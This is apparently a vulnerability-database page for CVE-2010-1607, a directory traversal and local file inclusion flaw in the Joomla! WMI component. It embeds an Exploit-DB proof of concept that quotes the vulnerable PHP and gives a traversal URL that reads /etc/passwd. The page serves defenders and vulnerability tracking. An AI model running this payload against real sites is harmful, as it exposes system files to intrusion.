CVE-2010-1607
Description
Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component WMI 1.5.0 - Local File Inclusion
================================================================================================
Title : Joomla Component wmi (com_wmi) LFI Vulnerability
Vendor : http://www.paysyspro.com/
Download : http://www.paysyspro.com/jotloader/files.download/3
Date : Sunday, 21 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
================================================================================================
[+] Vulnerable
./components/com_wmi/wmi.php
// Require specific controller if requested
if($controller = JRequest::getVar( 'controller' )) {
require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
}
[+] Exploit
http://[site]/[path]/index.php?option=com_wmi&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
================================================================================================
Very Special thanks :
Penghuni #nob0dy priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, cheche angela zhang, madonk, & Botรยฒ Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
to all my friends : mywisdom, cakill, aurell, hafiz, xco, kiddies, xshadow, gblack, petimati,
cakill, krembis, biakkobar, hendri_note
================================================================================================
# ./wishnusakti
References
- http://osvdb.org/63979
- http://secunia.com/advisories/39539
- http://www.exploit-db.com/exploits/12316
- http://www.securityfocus.com/bid/39608
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
- http://osvdb.org/63979
- http://secunia.com/advisories/39539
- http://www.exploit-db.com/exploits/12316
- http://www.securityfocus.com/bid/39608
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.